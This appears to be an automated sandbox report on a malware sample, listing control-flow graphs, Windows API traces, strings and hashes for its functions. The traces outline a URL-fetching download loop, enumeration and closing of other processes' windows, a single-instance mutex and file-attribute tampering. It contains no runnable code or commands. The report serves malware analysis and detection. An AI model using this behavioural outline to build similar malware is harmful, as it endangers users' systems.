                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1773 100042d0-1000430e 1774 10004314-1000431a 1773->1774 1775 1000458b 1773->1775 1776 10004320-10004466 InternetOpenA 1774->1776 1777 1000458d-1000459f call 10008d24 1775->1777 1778 10004576-10004585 Sleep 1776->1778 1779 1000446c-10004486 InternetOpenUrlA 1776->1779 1778->1775 1778->1776 1781 10004488-10004489 1779->1781 1782 1000448e-100044a6 GetProcessHeap RtlAllocateHeap 1779->1782 1784 10004574 1781->1784 1785 1000456c-10004571 1782->1785 1786 100044ac-100044c1 InternetReadFile 1782->1786 1784->1778 1785->1784 1787 100044c7-100044cb 1786->1787 1788 1000455c-10004566 GetProcessHeap HeapFree 1786->1788 1787->1788 1790 100044d1-100044e1 InternetCloseHandle 1787->1790 1788->1785 1792 100044e3-100044e9 1790->1792 1793 100044fd-10004500 1790->1793 1792->1793 1794 100044eb-100044fb GetProcessHeap HeapFree 1792->1794 1795 10004506-1000450c 1793->1795 1796 100045d7-100045e6 1793->1796 1794->1778 1795->1796 1797 10004512-10004519 1795->1797 1796->1777 1797->1796 1798 1000451f-10004526 1797->1798 1798->1796 1799 1000452c-10004543 GetProcessHeap RtlAllocateHeap 1798->1799 1800 100045a2-100045d5 call 10009b50 call 100028f0 GetProcessHeap RtlFreeHeap 1799->1800 1801 10004545-1000455a GetProcessHeap HeapFree 1799->1801 1800->1796 1801->1778
                                                                                                                APIs
                                                                                                                • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 10004459
                                                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 1000447B
                                                                                                                • GetProcessHeap.KERNEL32(00000000,01000000,?,0337F980), ref: 10004495
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0337F980), ref: 1000449C
                                                                                                                • InternetReadFile.WININET(?,00000000,01000000,00000000), ref: 100044B9
                                                                                                                • InternetCloseHandle.WININET(?,?,0337F980), ref: 100044D4
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,0337F980), ref: 100044EE
                                                                                                                • HeapFree.KERNEL32(00000000,?,0337F980), ref: 100044F5
                                                                                                                • Sleep.KERNEL32(00003A98,?,0337F980), ref: 1000457B
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,?,0337F980), ref: 100045C5
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,0337F980), ref: 100045CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Internet$Process$FreeOpen$AllocateCloseFileHandleReadSleep
                                                                                                                • String ID: 6A2V$<?xm
                                                                                                                • API String ID: 255649635-3461395071
                                                                                                                • Opcode ID: 24e24bde6225cf25946bfa02da2e268f2c94a300b62033f4b3aace04857ac023
                                                                                                                • Instruction ID: 2828dc31963fbdd3de02d3de4b16ef7da63b0a1eb9d536487fbc37706c5923d8
                                                                                                                • Opcode Fuzzy Hash: 24e24bde6225cf25946bfa02da2e268f2c94a300b62033f4b3aace04857ac023
                                                                                                                • Instruction Fuzzy Hash: 999133B4D00228EFEB21CFA8CC85B9EBBB4FF09351F118159E909AB255DB309A41CF55
                                                                                                                Function 004C6C85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 170stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1806 4c6c85-4c6ca1 call 4d4878 1809 4c6cba-4c6cd6 call 4d373b 1806->1809 1810 4c6ca3-4c6cb5 CallNextHookEx 1806->1810 1814 4c6cd8-4c6cdc 1809->1814 1815 4c6cea-4c6cf1 1809->1815 1812 4c6e77-4c6e78 1810->1812 1816 4c6e4b 1814->1816 1817 4c6ce2-4c6ce4 1814->1817 1818 4c6d3f-4c6d41 1815->1818 1819 4c6cf3-4c6d01 GetClassLongA 1815->1819 1821 4c6e4e-4c6e63 CallNextHookEx 1816->1821 1817->1815 1817->1816 1822 4c6d47-4c6d6a call 4c69f2 1818->1822 1823 4c6df0-4c6dfe GetWindowLongA 1818->1823 1819->1816 1820 4c6d07-4c6d12 1819->1820 1825 4c6d2b-4c6d39 lstrcmpiA 1820->1825 1826 4c6d14-4c6d28 GlobalGetAtomNameA 1820->1826 1828 4c6e65-4c6e6e UnhookWindowsHookEx 1821->1828 1829 4c6e72-4c6e76 1821->1829 1837 4c6d6c-4c6d70 1822->1837 1838 4c6dcd-4c6de0 call 4c6aa4 SetWindowLongA 1822->1838 1823->1816 1824 4c6e00-4c6e11 GetPropA 1823->1824 1824->1816 1830 4c6e13-4c6e25 SetPropA GetPropA 1824->1830 1825->1816 1825->1818 1826->1825 1828->1829 1829->1812 1830->1816 1832 4c6e27-4c6e3a GlobalAddAtomA 1830->1832 1833 4c6e3c 1832->1833 1834 4c6e41-4c6e45 SetWindowLongA 1832->1834 1833->1834 1834->1816 1837->1838 1839 4c6d72-4c6d7a 1837->1839 1843 4c6de7-4c6dee 1838->1843 1844 4c6de2-4c6de5 1838->1844 1839->1838 1841 4c6d7c-4c6d80 1839->1841 1841->1838 1845 4c6d82-4c6d97 call 4c67e2 1841->1845 1843->1821 1844->1843 1845->1838 1848 4c6d99-4c6dbd call 4c6aa4 GetWindowLongA 1845->1848 1848->1843 1852 4c6dbf-4c6dcb SetWindowLongA 1848->1852 1852->1844
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D4878: TlsGetValue.KERNEL32(005265C0,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?,00000100,00000000,?), ref: 004D48B7
                                                                                                                • CallNextHookEx.USER32(?,00000003,?,?), ref: 004C6CAF
                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 004C6CF6
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,004D317A), ref: 004C6D22
                                                                                                                • lstrcmpiA.KERNEL32(?,ime), ref: 004C6D31
                                                                                                                • GetWindowLongA.USER32(?,000000FC), ref: 004C6DA4
                                                                                                                • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004C6DC5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                                                                                                • String ID: $aR$AfxOldWndProc423$ime
                                                                                                                • API String ID: 3731301195-1769988331
                                                                                                                • Opcode ID: 73943fa7780241f38b2a64c574ab4d2819f186b6439d4b5fc8094abce8fb2c84
                                                                                                                • Instruction ID: d6ed5114679de13c28e437beadf57830423801f07f4c586c4207226c351764fe
                                                                                                                • Opcode Fuzzy Hash: 73943fa7780241f38b2a64c574ab4d2819f186b6439d4b5fc8094abce8fb2c84
                                                                                                                • Instruction Fuzzy Hash: F551C279600215BFCB61AF64DC48F6B3BA8FF14365F12852EF816AB291C738D904CB58
                                                                                                                Function 004C8A45 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1853 4c8a45-4c8a60 call 4c93e0 1856 4c8a67-4c8a6b 1853->1856 1857 4c8a62-4c8a65 1853->1857 1859 4c8a6d-4c8a76 GetParent 1856->1859 1860 4c8a78-4c8a7d GetWindow 1856->1860 1858 4c8a9f-4c8ab2 GetWindowRect 1857->1858 1862 4c8ab8-4c8aba 1858->1862 1863 4c8b43-4c8b6a GetParent GetClientRect * 2 MapWindowPoints 1858->1863 1861 4c8a83-4c8a87 1859->1861 1860->1861 1861->1858 1867 4c8a89-4c8a9b SendMessageA 1861->1867 1864 4c8abc-4c8aca GetWindowLongA 1862->1864 1865 4c8ad5-4c8ade 1862->1865 1866 4c8b70-4c8baf 1863->1866 1868 4c8acc-4c8ad1 1864->1868 1869 4c8ad3 1864->1869 1870 4c8b1a-4c8b41 GetWindowRect call 4a6dc1 call 4a6e2c CopyRect 1865->1870 1871 4c8ae0-4c8ae7 call 40f916 1865->1871 1872 4c8bb6-4c8bbd 1866->1872 1873 4c8bb1-4c8bb4 1866->1873 1867->1858 1874 4c8a9d 1867->1874 1868->1865 1868->1869 1869->1865 1870->1866 1884 4c8aec-4c8b18 call 4a6dc1 call 4a6e2c CopyRect * 2 1871->1884 1885 4c8ae9 1871->1885 1876 4c8bc7-4c8bca 1872->1876 1877 4c8bbf-4c8bc5 1872->1877 1873->1876 1874->1858 1880 4c8bcc-4c8bcf 1876->1880 1881 4c8bd1-4c8bd6 1876->1881 1877->1876 1886 4c8be1-4c8bee call 4c9543 1880->1886 1881->1886 1887 4c8bd8-4c8bde 1881->1887 1884->1866 1885->1884 1892 4c8bf3-4c8bf7 1886->1892 1887->1886
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • GetParent.USER32(?), ref: 004C8A70
                                                                                                                • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004C8A93
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004C8AAC
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 004C8ABF
                                                                                                                • CopyRect.USER32(?,?), ref: 004C8B0C
                                                                                                                • CopyRect.USER32(?,?), ref: 004C8B16
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004C8B1F
                                                                                                                  • Part of subcall function 004A6DC1: MonitorFromWindow.USER32(00000002,00000000), ref: 004A6DD6
                                                                                                                  • Part of subcall function 004A6E2C: GetMonitorInfoA.USER32(00000002,00000000), ref: 004A6E43
                                                                                                                • CopyRect.USER32(?,?), ref: 004C8B3B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
                                                                                                                • String ID: ($@
                                                                                                                • API String ID: 1450647913-1311469180
                                                                                                                • Opcode ID: be16caf3e0b8b41ac0f52a4977b024a8499580312520c274f66ea4a71e35eeaa
                                                                                                                • Instruction ID: 3910e08b789bccc83bac65a78aa5eb1dd2426e5809b5da297576190abfef2f69
                                                                                                                • Opcode Fuzzy Hash: be16caf3e0b8b41ac0f52a4977b024a8499580312520c274f66ea4a71e35eeaa
                                                                                                                • Instruction Fuzzy Hash: 7C515176A00219ABCB50DBB8DC85FAEBBB9AF44314F15012EF501F7295DB34AD058B68
                                                                                                                Function 10006170 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 335memorysleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1895 10006170-1000619c GetModuleFileNameA 1896 100061a2-100061c3 call 1000be33 1895->1896 1897 1000631c-10006331 call 10008d24 1895->1897 1902 100061c6-100061cb 1896->1902 1902->1902 1903 100061cd-10006202 call 1000be33 1902->1903 1906 10006205-1000620a 1903->1906 1906->1906 1907 1000620c-10006233 call 10009a10 1906->1907 1907->1897 1910 10006239-1000623e 1907->1910 1910->1897 1911 10006244-1000624c 1910->1911 1912 10006250-10006254 1911->1912 1913 100062a2-100062e7 call 10004d60 1912->1913 1914 10006256-10006260 1912->1914 1913->1897 1923 100062e9-10006305 call 10004d60 1913->1923 1915 10006262-1000626d 1914->1915 1916 1000629f 1914->1916 1918 1000629a-1000629d 1915->1918 1919 1000626f-1000627a 1915->1919 1916->1913 1918->1913 1921 10006295-10006298 1919->1921 1922 1000627c-10006291 1919->1922 1921->1913 1922->1912 1924 10006293 1922->1924 1927 10006334-10006350 call 10004d60 1923->1927 1928 10006307-10006316 GetProcessHeap HeapFree 1923->1928 1924->1913 1931 10006352-10006378 1927->1931 1932 1000637a 1927->1932 1928->1897 1931->1897 1933 10006380-1000638c GetFileAttributesA 1932->1933 1934 100063f6-10006402 GetFileAttributesA 1933->1934 1935 1000638e-100063ac call 1000e41c call 1000bf28 1933->1935 1937 10006404-1000641c call 1000e41c call 1000bf28 1934->1937 1938 1000646c 1934->1938 1956 100063b0-100063bd call 1000bf07 1935->1956 1961 10006422-1000642f call 1000bf07 1937->1961 1941 10006472-1000647e GetFileAttributesA 1938->1941 1945 10006480-10006489 1941->1945 1946 100064ec-100064fc call 100086e0 1941->1946 1950 1000648b-100064a1 call 1000e41c call 1000bf28 1945->1950 1951 100064be-100064dd call 10006600 1945->1951 1959 100065c0-100065cb Sleep 1946->1959 1960 10006502-1000651d call 1000be8d call 10009a10 1946->1960 1977 100064a3-100064b0 call 1000bf07 1950->1977 1951->1946 1975 100064df-100064e9 1951->1975 1974 100063bf-100063e3 call 10006600 1956->1974 1959->1933 1986 10006523-10006528 1960->1986 1987 100065ba 1960->1987 1976 10006431-1000645b call 10006600 1961->1976 1974->1934 1992 100063e5-100063f0 SetFileAttributesA 1974->1992 1975->1946 1976->1941 1996 1000645d-1000646a 1976->1996 1989 100064b2-100064b8 1977->1989 1986->1987 1988 1000652e-10006536 1986->1988 1987->1959 1993 10006538-1000653c 1988->1993 1989->1951 1992->1934 1994 10006592-100065b7 call 100051c0 call 1000bee1 1993->1994 1995 1000653e-1000654a 1993->1995 1994->1987 1997 1000654c-10006559 1995->1997 1998 1000658f 1995->1998 1996->1941 2000 1000658a-1000658d 1997->2000 2001 1000655b-10006568 1997->2001 1998->1994 2000->1994 2004 10006585-10006588 2001->2004 2005 1000656a-10006581 2001->2005 2004->1994 2005->1993 2007 10006583 2005->2007 2007->1994
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 10006194
                                                                                                                • _strrchr.LIBCMT ref: 10006229
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 10006307
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 10006316
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10006387
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 100063F0
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 100063FD
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 10006479
                                                                                                                • _strrchr.LIBCMT ref: 10006513
                                                                                                                  • Part of subcall function 1000E41C: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 1000E42F
                                                                                                                  • Part of subcall function 1000E41C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000E460
                                                                                                                • Sleep.KERNEL32(0002BF20,?,00000000), ref: 100065C5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$HeapTime_strrchr$FreeModuleNameProcessSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: at$d$ng$p
                                                                                                                • API String ID: 3749659953-777062955
                                                                                                                • Opcode ID: 0f8125bfd82b53fdd7aafdb3c97cdfbd3850ad1eb58e696d0f702bd24bf5aeda
                                                                                                                • Instruction ID: 573664d6437ee6934446c6ac3c60c780f0800bbe095913fce53b15821b61f99c
                                                                                                                • Opcode Fuzzy Hash: 0f8125bfd82b53fdd7aafdb3c97cdfbd3850ad1eb58e696d0f702bd24bf5aeda
                                                                                                                • Instruction Fuzzy Hash: 35C1B9B58002599AFB11DF60CD84FDAB7BDEF09380F1442E1E649E7146EA31EA85CF60
                                                                                                                Function 10004D60 Relevance: 21.1, APIs: 14, Instructions: 100memoryfileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 10004D80
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 10004D87
                                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000), ref: 10004D97
                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 10004DB6
                                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 10004DC1
                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 10004DDE
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10004DF9
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 10004E08
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 10004E0F
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10004E24
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 10004E30
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 10004E37
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10004E3E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10004E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wow64$FileHeapProcess$CloseCreateHandleRedirection$AllocateCurrentDisableFreeReadRevertSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2878847362-0
                                                                                                                • Opcode ID: 167de3636b38ea6bba5dc563bf90ae400321c0886e2a39db6dc0a1f03e5977f8
                                                                                                                • Instruction ID: 77c1acfabcda30780286521e7688078ae814e83d371c97531112157a442e730d
                                                                                                                • Opcode Fuzzy Hash: 167de3636b38ea6bba5dc563bf90ae400321c0886e2a39db6dc0a1f03e5977f8
                                                                                                                • Instruction Fuzzy Hash: 3A315C71A00218FBF7129FA4DC88F9E7BACFB48755F118156FA01E6190DB70DA008B64
                                                                                                                Function 100066E0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 150synchronizationCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 1000670D
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 10006714
                                                                                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 10006731
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 100068B6
                                                                                                                • ExitProcess.KERNEL32 ref: 100068C3
                                                                                                                • GetLastError.KERNEL32 ref: 100068C9
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100068D7
                                                                                                                • ExitProcess.KERNEL32 ref: 100068DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ExitToken$CloseCreateCurrentErrorHandleInformationLastMutexOpen
                                                                                                                • String ID: 6A2V
                                                                                                                • API String ID: 4076312586-3928244006
                                                                                                                • Opcode ID: b8d26ceed53c047e46700abf3b324bc6c41cf1ba4b41ede2c5a790d9ee31a838
                                                                                                                • Instruction ID: 2b1cf3a252d780ef2a9d97db670ca594afcadeaaedd777b79188a83f88e3e9d7
                                                                                                                • Opcode Fuzzy Hash: b8d26ceed53c047e46700abf3b324bc6c41cf1ba4b41ede2c5a790d9ee31a838
                                                                                                                • Instruction Fuzzy Hash: 5D719BB4D0925CDBEB21CFA9D985A9DBBB4FF08350F20422DE905AB352DB309A45CF44
                                                                                                                Function 004C9F7B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2133 4c9f7b-4c9f98 call 4aef44 2136 4c9f9a-4c9fa2 call 4d373b 2133->2136 2137 4c9fa5-4c9fcf call 4d373b call 4c8f92 * 2 2133->2137 2136->2137 2146 4c9ffb-4c9ffe 2137->2146 2147 4c9fd1-4c9fe1 2137->2147 2148 4ca000-4ca02d call 4cb875 2146->2148 2149 4c9fe3-4c9fe5 2146->2149 2147->2149 2154 4c9fea-4c9ff8 2147->2154 2155 4ca02f-4ca039 GetSystemMetrics 2148->2155 2156 4ca082-4ca0b6 call 4cb6c4 call 4cb9fe call 4cb761 call 4cb753 2148->2156 2152 4ca18c-4ca19a 2149->2152 2154->2146 2159 4ca03f-4ca050 call 4af56e 2155->2159 2160 4ca0c4-4ca0d7 call 4c6e7b 2155->2160 2156->2160 2187 4ca0b8-4ca0c1 GlobalLock 2156->2187 2168 4ca078-4ca07d 2159->2168 2169 4ca052-4ca063 call 4af56e 2159->2169 2170 4ca0dd 2160->2170 2171 4ca0d9-4ca0db 2160->2171 2168->2156 2173 4ca07f 2168->2173 2169->2168 2181 4ca065-4ca076 call 4af56e 2169->2181 2172 4ca0e0-4ca0fc CreateDialogIndirectParamA call 4c5eaa 2170->2172 2171->2172 2179 4ca101-4ca126 2172->2179 2173->2156 2185 4ca128-4ca136 2179->2185 2186 4ca143-4ca14a call 4c6ec7 2179->2186 2181->2160 2181->2168 2185->2186 2192 4ca138-4ca13b 2185->2192 2193 4ca14c-4ca14e 2186->2193 2194 4ca156-4ca159 2186->2194 2187->2160 2192->2186 2193->2194 2195 4ca16d-4ca170 2194->2195 2196 4ca15b-4ca15f 2194->2196 2198 4ca184-4ca189 2195->2198 2199 4ca172-4ca17e GlobalUnlock GlobalFree 2195->2199 2196->2195 2197 4ca161-4ca16a DestroyWindow 2196->2197 2197->2195 2198->2152 2199->2198
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C9F80
                                                                                                                • GetSystemMetrics.USER32(0000002A), ref: 004CA031
                                                                                                                • GlobalLock.KERNEL32(?), ref: 004CA0BB
                                                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,004C9D26,00000000), ref: 004CA0ED
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                                • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                                                                                                • API String ID: 2364537584-2894235370
                                                                                                                • Opcode ID: 94003137178f02f13dcb0fbd09cbb30b01efeb0a306cce430947aba5841cb28f
                                                                                                                • Instruction ID: 8f8ca1ad54031ad0f3e120d7fe1f145f40c081d00986a5daf0d6078a2471081a
                                                                                                                • Opcode Fuzzy Hash: 94003137178f02f13dcb0fbd09cbb30b01efeb0a306cce430947aba5841cb28f
                                                                                                                • Instruction Fuzzy Hash: 07618B7490024AEFCF50EFA5C885EAEBBB1EF14348F14402FF505A2291CB388E55CB5A
                                                                                                                Function 10005290 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158sleepprocesswindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2200 10005290-100052cd 2201 100052d0-100052e4 CreateToolhelp32Snapshot 2200->2201 2202 10005541-1000554c Sleep 2201->2202 2203 100052ea-10005303 Process32FirstW 2201->2203 2202->2201 2204 10005309 2203->2204 2205 1000553a-1000553b CloseHandle 2203->2205 2206 10005310-1000531f 2204->2206 2205->2202 2207 10005321-10005329 2206->2207 2208 10005394 2206->2208 2207->2207 2209 1000532b-10005333 2207->2209 2210 10005396 2208->2210 2209->2208 2211 10005335-10005344 2209->2211 2212 10005398-1000539c 2210->2212 2211->2210 2213 10005346 2211->2213 2214 100053a9-10005505 FindWindowExA 2212->2214 2215 1000539e-100053a2 2212->2215 2216 10005350-1000538a 2213->2216 2218 10005514-1000551f EnumWindows 2214->2218 2219 10005507-1000550e PostMessageW 2214->2219 2215->2212 2217 100053a4 2215->2217 2216->2216 2220 1000538c-10005392 2216->2220 2221 10005525-10005534 Process32NextW 2217->2221 2218->2221 2219->2218 2220->2210 2221->2205 2221->2206
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100052D4
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 100052FC
                                                                                                                • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 100054FD
                                                                                                                • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 1000550E
                                                                                                                • EnumWindows.USER32(10004CB0,?), ref: 1000551F
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 1000552D
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 1000553B
                                                                                                                • Sleep.KERNEL32(00001770,00000002,00000000), ref: 10005546
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateEnumFindFirstHandleMessageNextPostSleepSnapshotToolhelp32WindowWindows
                                                                                                                • String ID: 6A2V$e T3
                                                                                                                • API String ID: 2775078904-3670868295
                                                                                                                • Opcode ID: aa0dea92c5c97a6388449d677105f53942821ae44b199a6d30a1069d2dbab7ef
                                                                                                                • Instruction ID: 830b30aaeb561c28df364b661811c8f810fd65b94cb55e2501b621c2832f2fb3
                                                                                                                • Opcode Fuzzy Hash: aa0dea92c5c97a6388449d677105f53942821ae44b199a6d30a1069d2dbab7ef
                                                                                                                • Instruction Fuzzy Hash: 557139B4D022289FEB64DF59DC89B9EBBB4FF09340F1041D9E848A7291DB709A81CF45
